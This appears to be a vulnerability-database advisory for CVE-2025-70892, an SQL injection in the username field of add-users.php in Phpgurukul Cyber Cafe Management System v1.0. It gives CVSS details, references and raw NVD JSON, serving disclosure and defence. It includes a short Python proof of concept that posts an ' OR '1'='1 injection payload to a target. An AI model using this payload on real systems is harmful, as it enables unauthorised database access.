CVE-2025-70892

Description

Phpgurukul Cyber Cafe Management System v1.0 contains a SQL Injection vulnerability in the user management module. The application fails to properly validate user-supplied input in the username parameter of the add-users.php endpoint.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:phpgurukul:cyber_cafe_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Phpgurukul Cyber Cafe Management System v1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

python import requests target = 'http://target.com/add-users.php' payload = "' OR '1'='1 -- -" data = {'username': payload, 'password': 'test123', 'email': '[email protected]'} response = requests.post(target, data=data) print(response.text)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-70892
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-70892
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-70892/
[4] VulDB https://vuldb.com/cve/CVE-2025-70892
[5] https://github.com/efekaanakkar/Cyber-Cafe-Management-System-CVEs/tree/main/CVE-2025-70892
[6] https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-70892", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:05.010", "lastModified": "2026-01-22T16:00:53.547", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Phpgurukul Cyber Cafe Management System v1.0 contains a SQL Injection vulnerability in the user management module. The application fails to properly validate user-supplied input in the username parameter of the add-users.php endpoint."}, {"lang": "es", "value": "Phpgurukul Cyber Cafe Management System v1.0 contiene una vulnerabilidad de inyección SQL en el módulo de gestión de usuarios. La aplicación no valida correctamente la entrada proporcionada por el usuario en el parámetro username del endpoint add-users.PHP."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:cyber_cafe_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "076A2810-A876-4B7D-B728-BCCE977A7225"}]}]}], "references": [{"url": "https://github.com/efekaanakkar/Cyber-Cafe-Management-System-CVEs/tree/main/CVE-2025-70892", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/", "source": "[email protected]", "tags": ["Product"]}]}}